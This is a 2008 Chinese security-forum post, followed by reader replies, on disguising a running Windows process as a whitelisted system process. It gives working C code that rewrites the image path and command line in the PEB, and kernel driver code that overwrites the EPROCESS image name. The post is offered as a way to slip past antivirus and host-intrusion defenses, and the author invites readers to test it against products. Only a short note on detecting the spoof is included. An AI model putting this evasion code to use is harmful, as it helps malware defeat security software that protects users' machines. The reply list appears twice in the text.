[原创]运行期修改可执行文件的路径和Command Line-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[原创]运行期修改可执行文件的路径和Command Line

发表于: 2008-1-4 17:56 30529

[原创]运行期修改可执行文件的路径和Command Line

NetRoc

2008-1-4 17:56

30529

cc682/NetRoc
目前的很多主动防御工具和反XX系统，在对特定进程进行保护的时候，出于兼容性的考虑，都会保留一些白名单。特别是一些系统进程，例如csrss.exe、svchost.exe等等。而针对这些系统进程，判断是否在白名单中的方式，为了简便起见经常采用取系统路径、可执行文件名的方式。
内核中比较明显的能够取到可执行文件路径的方法有下面几个：
1、通过PEB. ProcessParameters -> ImagePathName取得可执行文件路径，通过PEB. ProcessParameters -> CommandLine取得执行的命令行，以及PEB. ProcessParameters里面其他几个成员取得其他一些相关的路径信息。
2、通过nt!_EPROCESS的ImageFileName取得。
3、通过nt!_EPROCESS:: SeAuditProcessCreationInfo:: ImageFileName取得。
4、通过和_EPROCESS相关的文件对象信息取得。
常见的方式一般只有1、2两种。而上述的前三种方式都可以在运行时被修改掉，用来进行欺骗。特别是PEB里面的信息由于在ring3直接就可以访问，实现上来说非常简单。
下面这段代码通过NtQueryInformationProcess拿到PEB，然后修改路径信息：
HMODULE hMod = GetModuleHandle( _T( "ntdll.dll"));
pfnNtQueryInformationProcess p = (pfnNtQueryInformationProcess)::GetProcAddress( hMod, "NtQueryInformationProcess");

PROCESS_BASIC_INFORMATION stInfo = {0};
DWORD dwRetnLen = 0;
DWORD dw = p( GetCurrentProcess(), ProcessBasicInformation, &stInfo, sizeof(stInfo), &dwRetnLen);

PPEB pPeb = stInfo.PebBaseAddress;

WCHAR wszFullPath[MAX_PATH] = {0};
WCHAR wszTmp2[MAX_PATH] = {0};
wcscpy( wszFullPath, wszPath);
MultiByteToWideChar( CP_THREAD_ACP, 0, szName, -1, wszTmp2, MAX_PATH);
wcscat( wszFullPath, wszTmp2);

wcscpy( pPeb->ProcessParameters->ImagePathName.Buffer, wszFullPath);
pPeb->ProcessParameters->ImagePathName.Length = wcslen( wszFullPath) * sizeof(WCHAR);

int nParamStart = 0;
WCHAR *wszTmp = new WCHAR[pPeb->ProcessParameters->CommandLine.MaximumLength];
ZeroMemory( wszTmp, sizeof(WCHAR) * pPeb->ProcessParameters->CommandLine.MaximumLength);

wcscpy( wszTmp, pPeb->ProcessParameters->CommandLine.Buffer);

if ( pPeb->ProcessParameters->CommandLine.Buffer[0] == '"')
{
for ( int i = 1; i < pPeb->ProcessParameters->CommandLine.Length / 2; i++)
{
if ( pPeb->ProcessParameters->CommandLine.Buffer[i] == '"')
{
nParamStart = i;
}
}
}

if ( nParamStart != 0)
{
if ( pPeb->ProcessParameters->CommandLine.Buffer[0] == '"')
{
pPeb->ProcessParameters->CommandLine.Buffer[0] = NULL;
wcscat( pPeb->ProcessParameters->CommandLine.Buffer, L"\"");
}
else
{
pPeb->ProcessParameters->CommandLine.Buffer[0] = NULL;
}
wcscat( pPeb->ProcessParameters->CommandLine.Buffer, wszFullPath);
wcscat( pPeb->ProcessParameters->CommandLine.Buffer, wszTmp + nParamStart);
}
delete[] wszTmp;
这个方式可以欺骗通过toolhelp函数枚举出来的模块路径，以及直接读取PEB获取进程主模块路径的方式。
另外，通过修改EPROCESS中的主模块名信息，可以欺骗一些在驱动层的程序。基本的代码如下：
首先需要获取EPROCESS里面ImageFileName的偏移。这个函数必须在DriverEntry里面调用。
ULONG GetNameOffsetInEProcss()
{
PEPROCESS pProcess = NULL;
ULONG i = 0;

pProcess = PsGetCurrentProcess();
for ( i = 0; i < 0x1000; i++)
{
if ( strncmp( "System", (PUCHAR)pProcess + i, strlen("System")) == 0)
{
return i;
}
}
return 0;
}
然后可以在IoCtrl里面修改当前进程的名字：
case IOCTL_CHANGE_EXENAME:
szName = (char*)Irp->AssociatedIrp.SystemBuffer;
if ( !szName)
{
ntStatus = STATUS_UNSUCCESSFUL;
break;
}
pEProcess = PsGetCurrentProcess();
strncpy( (PCHAR)pEProcess + g_NameOffsetInEProcess, szName, 16);
ntStatus = STATUS_SUCCESS;
break;
由于只是示例，所以只实现了良种方式。修改SeAuditProcessCreationInfo里面的信息，考虑到兼容性问题，可能稍微复杂一点。不过也可以比较容易的实现。
这种方式的伪装可以穿过多少主动防御工具没有试过，大家可以去看看，哈哈。
至于对付的方式，可以通过上面说的第四种取进程路径的方法。不过就比较复杂了，呵呵。
流程就是，通过EPROCESS的SectionObject获得文件的FilePointer，通过ObQueryNameString取得这个对象的名字。然后就可以取得主映像模块的路径了。详细的代码可以参考wrk中NtQueryInformationProcess的相关实现。
下面是实现的代码:

[课程]FART 脱壳王！加量不加价！FART作者讲授！

#系统底层

上传的附件：

ImgPathChanger.rar （335.54kb，886次下载）

收藏・44

免费・7

支持

最新回复 (39) 1 2 ▶
一块三毛钱雪币： 277 活跃值： (321) 能力值： ( LV12，RANK：450 ) 在线值：发帖 12 回帖 38 粉丝 2 关注私信	一块三毛钱 11 2 楼强悍，顶一下！ 2008-1-4 18:05 0
huajt2004 雪币： 414 活跃值： (32) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 16 粉丝 0 关注私信	huajt2004 3 楼高，佩服！！ 2008-1-4 18:16 0
forgot 雪币： 6075 活跃值： (2236) 能力值： (RANK：1060 ) 在线值：发帖 155 回帖 3771 粉丝 15 关注私信	forgot 26 4 楼太有才了，顶 2008-1-4 18:40 0
forgot 雪币： 6075 活跃值： (2236) 能力值： (RANK：1060 ) 在线值：发帖 155 回帖 3771 粉丝 15 关注私信	forgot 26 5 楼貌似跟这个有点像http://www.osdiy.com/blog/article.asp?id=15 2008-1-4 19:09 0
海风月影雪币： 7309 活跃值： (3778) 能力值： (RANK：1130 ) 在线值：发帖 93 回帖 2308 粉丝 119 关注私信	海风月影 22 6 楼很强，我记得某个explorer.exe就是伪装版的explorer.exe 2008-1-4 19:14 0
sudami 雪币： 709 活跃值： (2420) 能力值： ( LV12，RANK：1010 ) 在线值：发帖 71 回帖 1582 粉丝 64 关注私信	sudami 25 7 楼思路好新颖啊~ 马上试下看能不能过微点~~~~ 2008-1-4 19:56 0
xzchina 雪币： 615 活跃值： (1132) 能力值： ( LV4，RANK：50 ) 在线值：发帖 42 回帖 843 粉丝 0 关注私信	xzchina 1 8 楼牛人 2008-1-4 21:00 0
RyoKou 雪币： 214 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 78 粉丝 0 关注私信	RyoKou 1 9 楼顶。。。。。。。。 2008-1-4 21:19 0
lsuper 雪币： 200 活跃值： (165) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 51 粉丝 0 关注私信	lsuper 10 楼强悍！支持一把啊 2008-1-4 21:28 0
binliao 雪币： 1373 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 68 粉丝 1 关注私信	binliao 11 楼思路好新颖啊，慢慢消化。 2008-1-4 22:32 0
asd 雪币： 6910 活跃值： (3410) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 161 粉丝 1 关注私信	asd 12 楼 2008-1-4 22:45 0
szdbg 雪币： 266 活跃值： (52) 能力值： ( LV9，RANK：210 ) 在线值：发帖 48 回帖 305 粉丝 6 关注私信	szdbg 5 13 楼强贴，不得不顶。。。 2008-1-4 23:07 0
HSQ 雪币： 381 活跃值： (140) 能力值： ( LV13，RANK：330 ) 在线值：发帖 36 回帖 332 粉丝 7 关注私信	HSQ 8 14 楼也来试用一下 2008-1-5 16:37 0
qyc 雪币： 707 活跃值： (1301) 能力值： ( LV9，RANK：190 ) 在线值：发帖 28 回帖 550 粉丝 27 关注私信	qyc 4 15 楼是你的防忽悠吧 ,!! 2008-1-6 00:47 0
Bughoho 雪币： 1946 活跃值： (243) 能力值： (RANK：330 ) 在线值：发帖 72 回帖 1217 粉丝 27 关注私信	Bughoho 8 16 楼好贴必顶 2008-1-6 01:22 0
foxabu 雪币： 325 活跃值： (97) 能力值： ( LV13，RANK：530 ) 在线值：发帖 55 回帖 1236 粉丝 5 关注私信	foxabu 13 17 楼 Cheat Engine 2008-1-6 10:36 0
曾半仙雪币： 3758 活跃值： (3282) 能力值： ( LV15，RANK：500 ) 在线值：发帖 19 回帖 491 粉丝 81 关注私信	曾半仙 12 18 楼嘿嘿, 一边坏笑一边毒毒地试用了... 2008-1-6 16:37 0
jevonsmmx 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 6 粉丝 0 关注私信	jevonsmmx 19 楼真牛啊。。。。 2008-1-6 17:33 0
火翼[CCG] 雪币： 435 活跃值： (172) 能力值： ( LV13，RANK：280 ) 在线值：发帖 26 回帖 252 粉丝 4 关注私信	火翼[CCG] 6 20 楼好贴，顶 2008-1-10 15:33 0
流动的情感雪币： 226 活跃值： (30) 能力值： ( LV9，RANK：170 ) 在线值：发帖 19 回帖 75 粉丝 1 关注私信	流动的情感 4 21 楼不顶不行啊。正在学习反主动防御好东东啊。。 2008-1-16 09:59 0
combojiang 雪币： 321 活跃值： (271) 能力值： ( LV13，RANK：1050 ) 在线值：发帖 44 回帖 765 粉丝 55 关注私信	combojiang 26 22 楼好文，学习。。。 2008-1-16 10:45 0
快雪时晴雪币： 370 活跃值： (15) 能力值： ( LV9，RANK：170 ) 在线值：发帖 34 回帖 2272 粉丝 1 关注私信	快雪时晴 4 23 楼想法决定成败，强！如果路径可以欺骗，那么MD5（exe文件）也就完全失效了，不仅穿越不少主动防御系统，我想大部分防火墙估计都完蛋了，形同虚设。估计该贴技术马上被病毒设计院引进了 2008-1-16 11:10 0
流动的情感雪币： 226 活跃值： (30) 能力值： ( LV9，RANK：170 ) 在线值：发帖 19 回帖 75 粉丝 1 关注私信	流动的情感 4 24 楼楼上的讲的不错。但还有个问题要解决我试了楼主的方法程序必须启动在杀毒软件或防火墙之前否则是无效的因为杀毒软件在程序运行的时候记录下了路径。 2008-1-16 12:21 0
nuke 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 73 粉丝 0 关注私信	nuke 25 楼正好在找这些结构, 之前编译器中PPEB的结构信息不全，老是 left of 'ProcessParameters' specifies undefined struct/union '_PEB' 这次自己手动加这些结构就OK了还有个情况，用NtQueryInformationProcess查询其他进程信息的时候 pPeb->ProcessParameters->ImagePathName.Buffer 遇到services.exe, svchost.exe或者瑞星的rav/ccenter.exe的时候都会崩溃怎么作个判断让程序不崩呢 2008-3-11 15:05 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

NetRoc

发帖

108

回帖

490

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (39) 1 2 ▶
一块三毛钱雪币： 277 活跃值： (321) 能力值： ( LV12，RANK：450 ) 在线值：发帖 12 回帖 38 粉丝 2 关注私信	一块三毛钱 11 2 楼强悍，顶一下！ 2008-1-4 18:05 0
huajt2004 雪币： 414 活跃值： (32) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 16 粉丝 0 关注私信	huajt2004 3 楼高，佩服！！ 2008-1-4 18:16 0
forgot 雪币： 6075 活跃值： (2236) 能力值： (RANK：1060 ) 在线值：发帖 155 回帖 3771 粉丝 15 关注私信	forgot 26 4 楼太有才了，顶 2008-1-4 18:40 0
forgot 雪币： 6075 活跃值： (2236) 能力值： (RANK：1060 ) 在线值：发帖 155 回帖 3771 粉丝 15 关注私信	forgot 26 5 楼貌似跟这个有点像http://www.osdiy.com/blog/article.asp?id=15 2008-1-4 19:09 0
海风月影雪币： 7309 活跃值： (3778) 能力值： (RANK：1130 ) 在线值：发帖 93 回帖 2308 粉丝 119 关注私信	海风月影 22 6 楼很强，我记得某个explorer.exe就是伪装版的explorer.exe 2008-1-4 19:14 0
sudami 雪币： 709 活跃值： (2420) 能力值： ( LV12，RANK：1010 ) 在线值：发帖 71 回帖 1582 粉丝 64 关注私信	sudami 25 7 楼思路好新颖啊~ 马上试下看能不能过微点~~~~ 2008-1-4 19:56 0
xzchina 雪币： 615 活跃值： (1132) 能力值： ( LV4，RANK：50 ) 在线值：发帖 42 回帖 843 粉丝 0 关注私信	xzchina 1 8 楼牛人 2008-1-4 21:00 0
RyoKou 雪币： 214 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 78 粉丝 0 关注私信	RyoKou 1 9 楼顶。。。。。。。。 2008-1-4 21:19 0
lsuper 雪币： 200 活跃值： (165) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 51 粉丝 0 关注私信	lsuper 10 楼强悍！支持一把啊 2008-1-4 21:28 0
binliao 雪币： 1373 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 68 粉丝 1 关注私信	binliao 11 楼思路好新颖啊，慢慢消化。 2008-1-4 22:32 0
asd 雪币： 6910 活跃值： (3410) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 161 粉丝 1 关注私信	asd 12 楼 2008-1-4 22:45 0
szdbg 雪币： 266 活跃值： (52) 能力值： ( LV9，RANK：210 ) 在线值：发帖 48 回帖 305 粉丝 6 关注私信	szdbg 5 13 楼强贴，不得不顶。。。 2008-1-4 23:07 0
HSQ 雪币： 381 活跃值： (140) 能力值： ( LV13，RANK：330 ) 在线值：发帖 36 回帖 332 粉丝 7 关注私信	HSQ 8 14 楼也来试用一下 2008-1-5 16:37 0
qyc 雪币： 707 活跃值： (1301) 能力值： ( LV9，RANK：190 ) 在线值：发帖 28 回帖 550 粉丝 27 关注私信	qyc 4 15 楼是你的防忽悠吧 ,!! 2008-1-6 00:47 0
Bughoho 雪币： 1946 活跃值： (243) 能力值： (RANK：330 ) 在线值：发帖 72 回帖 1217 粉丝 27 关注私信	Bughoho 8 16 楼好贴必顶 2008-1-6 01:22 0
foxabu 雪币： 325 活跃值： (97) 能力值： ( LV13，RANK：530 ) 在线值：发帖 55 回帖 1236 粉丝 5 关注私信	foxabu 13 17 楼 Cheat Engine 2008-1-6 10:36 0
曾半仙雪币： 3758 活跃值： (3282) 能力值： ( LV15，RANK：500 ) 在线值：发帖 19 回帖 491 粉丝 81 关注私信	曾半仙 12 18 楼嘿嘿, 一边坏笑一边毒毒地试用了... 2008-1-6 16:37 0
jevonsmmx 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 6 粉丝 0 关注私信	jevonsmmx 19 楼真牛啊。。。。 2008-1-6 17:33 0
火翼[CCG] 雪币： 435 活跃值： (172) 能力值： ( LV13，RANK：280 ) 在线值：发帖 26 回帖 252 粉丝 4 关注私信	火翼[CCG] 6 20 楼好贴，顶 2008-1-10 15:33 0
流动的情感雪币： 226 活跃值： (30) 能力值： ( LV9，RANK：170 ) 在线值：发帖 19 回帖 75 粉丝 1 关注私信	流动的情感 4 21 楼不顶不行啊。正在学习反主动防御好东东啊。。 2008-1-16 09:59 0
combojiang 雪币： 321 活跃值： (271) 能力值： ( LV13，RANK：1050 ) 在线值：发帖 44 回帖 765 粉丝 55 关注私信	combojiang 26 22 楼好文，学习。。。 2008-1-16 10:45 0
快雪时晴雪币： 370 活跃值： (15) 能力值： ( LV9，RANK：170 ) 在线值：发帖 34 回帖 2272 粉丝 1 关注私信	快雪时晴 4 23 楼想法决定成败，强！如果路径可以欺骗，那么MD5（exe文件）也就完全失效了，不仅穿越不少主动防御系统，我想大部分防火墙估计都完蛋了，形同虚设。估计该贴技术马上被病毒设计院引进了 2008-1-16 11:10 0
流动的情感雪币： 226 活跃值： (30) 能力值： ( LV9，RANK：170 ) 在线值：发帖 19 回帖 75 粉丝 1 关注私信	流动的情感 4 24 楼楼上的讲的不错。但还有个问题要解决我试了楼主的方法程序必须启动在杀毒软件或防火墙之前否则是无效的因为杀毒软件在程序运行的时候记录下了路径。 2008-1-16 12:21 0
nuke 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 73 粉丝 0 关注私信	nuke 25 楼正好在找这些结构, 之前编译器中PPEB的结构信息不全，老是 left of 'ProcessParameters' specifies undefined struct/union '_PEB' 这次自己手动加这些结构就OK了还有个情况，用NtQueryInformationProcess查询其他进程信息的时候 pPeb->ProcessParameters->ImagePathName.Buffer 遇到services.exe, svchost.exe或者瑞星的rav/ccenter.exe的时候都会崩溃怎么作个判断让程序不崩呢 2008-3-11 15:05 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复